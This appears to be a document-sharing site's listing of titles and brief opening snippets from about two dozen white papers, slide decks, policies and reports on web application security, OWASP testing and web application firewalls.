Using Free Tools To Test Web Application Security Speaker Biography Matt Neely, CISSP, CTGA, GCIH, and GCWN Manager of the Profiling Team at SecureState Areas of expertise: wireless, penetration testing,
The Weakest Link: Mitigating Web Application Vulnerabilities. webscurity White Paper. webscurity Inc. Minneapolis, Minnesota USA
The Weakest Link: Mitigating Web Application Vulnerabilities webscurity White Paper webscurity Inc. Minneapolis, Minnesota USA January 25, 2007 Contents Executive Summary...3 Introduction...4 Target Audience...4
Top 10 Web Application Security Vulnerabilities - with focus on PHP
Top 10 Web Application Security Vulnerabilities - with focus on PHP Louise Berthilson Alberto Escudero Pascual 1 Resources The Top 10 Project by OWASP www.owasp.org/index.php/owasp_top_ten_project
Bug Report. Date: March 19, 2011 Reporter: Chris Jarabek ([email protected])
Bug Report Date: March 19, 2011 Reporter: Chris Jarabek ([email protected]) Software: Kimai Version: 0.9.1.1205 Website: http://www.kimai.org Description: Kimai is a web based time-tracking application.
MatriXay WEB Application Vulnerability Scanner V 5.0. 1. Overview. (DAS- WEBScan ) - - - - - The best WEB application assessment tool
MatriXay DAS-WEBScan MatriXay WEB Application Vulnerability Scanner V 5.0 (DAS- WEBScan ) - - - - - The best WEB application assessment tool 1. Overview MatriXay DAS- Webscan is a specific application
DFW INTERNATIONAL AIRPORT STANDARD OPERATING PROCEDURE (SOP)
Title: Functional Category: Information Technology Services Issuing Department: Information Technology Services Code Number: xx.xxx.xx Effective Date: xx/xx/2014 1.0 PURPOSE 1.1 To appropriately manage
External Network & Web Application Assessment. For The XXX Group LLC October 2012
External Network & Web Application Assessment For The XXX Group LLC October 2012 This report is solely for the use of client personal. No part of it may be circulated, quoted, or reproduced for distribution
WHITE PAPER. FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6
WHITE PAPER FortiWeb Web Application Firewall Ensuring Compliance for PCI DSS 6.5 and 6.6 Ensuring compliance for PCI DSS 6.5 and 6.6 Page 2 Overview Web applications and the elements surrounding them
Six Essential Elements of Web Application Security. Cost Effective Strategies for Defending Your Business
6 Six Essential Elements of Web Application Security Cost Effective Strategies for Defending Your Business An Introduction to Defending Your Business Against Today s Most Common Cyber Attacks When web
The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.
This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out
Web Application Vulnerabilities and Avoiding Application Exposure
Web Application Vulnerabilities and Avoiding Application Exposure The introduction of BIG-IP Application Security Manager (ASM) version 9.4.2 marks a major step forward. BIG-IP ASM now offers more features
Integrating Security Testing into Quality Control
Integrating Security Testing into Quality Control Executive Summary At a time when 82% of all application vulnerabilities are found in web applications 1, CIOs are looking for traditional and non-traditional
Threat Modeling. Categorizing the nature and severity of system vulnerabilities. John B. Dickson, CISSP
Threat Modeling Categorizing the nature and severity of system vulnerabilities John B. Dickson, CISSP What is Threat Modeling? Structured approach to identifying, quantifying, and addressing threats. Threat
Web Application Security
Web Application Security Security Mitigations Halito 26 juni 2014 Content Content... 2 Scope of this document... 3 OWASP Top 10... 4 A1 - Injection... 4... 4... 4 A2 - Broken Authentication and Session
How To Protect A Web Application From Attack From A Trusted Environment
Standard: Version: Date: Requirement: Author: PCI Data Security Standard (PCI DSS) 1.2 October 2008 6.6 PCI Security Standards Council Information Supplement: Application Reviews and Web Application Firewalls
8070.S000 Application Security
8070.S000 Application Security Last Revised: 02/26/15 Final 02/26/15 REVISION CONTROL Document Title: Author: File Reference: Application Security Information Security 8070.S000_Application_Security.docx
Implementation of Web Application Firewall
Implementation of Web Application Firewall OuTian 1 Introduction Abstract Web 層 應 用 程 式 之 攻 擊 日 趨 嚴 重, 而 國 內 多 數 企 業 仍 不 知 該 如 何 以 資 安 設 備 阻 擋, 仍 在 採 購 傳 統 的 Firewall/IPS,
05.0 Application Development
Number 5.0 Policy Owner Information Security and Technology Policy Application Development Effective 01/01/2014 Last Revision 12/30/2013 Department of Innovation and Technology 5. Application Development
Testing the OWASP Top 10 Security Issues
Testing the OWASP Top 10 Security Issues Andy Tinkham & Zach Bergman, Magenic Technologies Contact Us 1600 Utica Avenue South, Suite 800 St. Louis Park, MN 55416 1 (877)-277-1044 [email protected] Who Are
Web Application Security
Web Application Security John Zaharopoulos ITS - Security 10/9/2012 1 Web App Security Trends Web 2.0 Dynamic Webpages Growth of Ajax / Client side Javascript Hardening of OSes Secure by default Auto-patching
SQuAD: Application Security Testing
SQuAD: Application Security Testing Terry Morreale Ben Whaley June 8, 2010 Why talk about security? There has been exponential growth of networked digital systems in the past 15 years The great things
Data Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
Lotus Domino Security
An X-Force White Paper Lotus Domino Security December 2002 6303 Barfield Road Atlanta, GA 30328 Tel: 404.236.2600 Fax: 404.236.2626 Introduction Lotus Domino is an Application server that provides groupware
Web Application Security Considerations
Web Application Security Considerations Eric Peele, Kevin Gainey International Field Directors & Technology Conference 2006 May 21 24, 2006 RTI International is a trade name of Research Triangle Institute
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications Slides by Connor Schnaith Cross-Site Request Forgery One-click attack, session riding Recorded since 2001 Fourth out of top 25 most
Threat Modeling/ Security Testing. Tarun Banga, Adobe 1. Agenda
Threat Modeling/ Security Testing Presented by: Tarun Banga Sr. Manager Quality Engineering, Adobe Quality Leader (India) Adobe Systems India Pvt. Ltd. Agenda Security Principles Why Security Testing Security
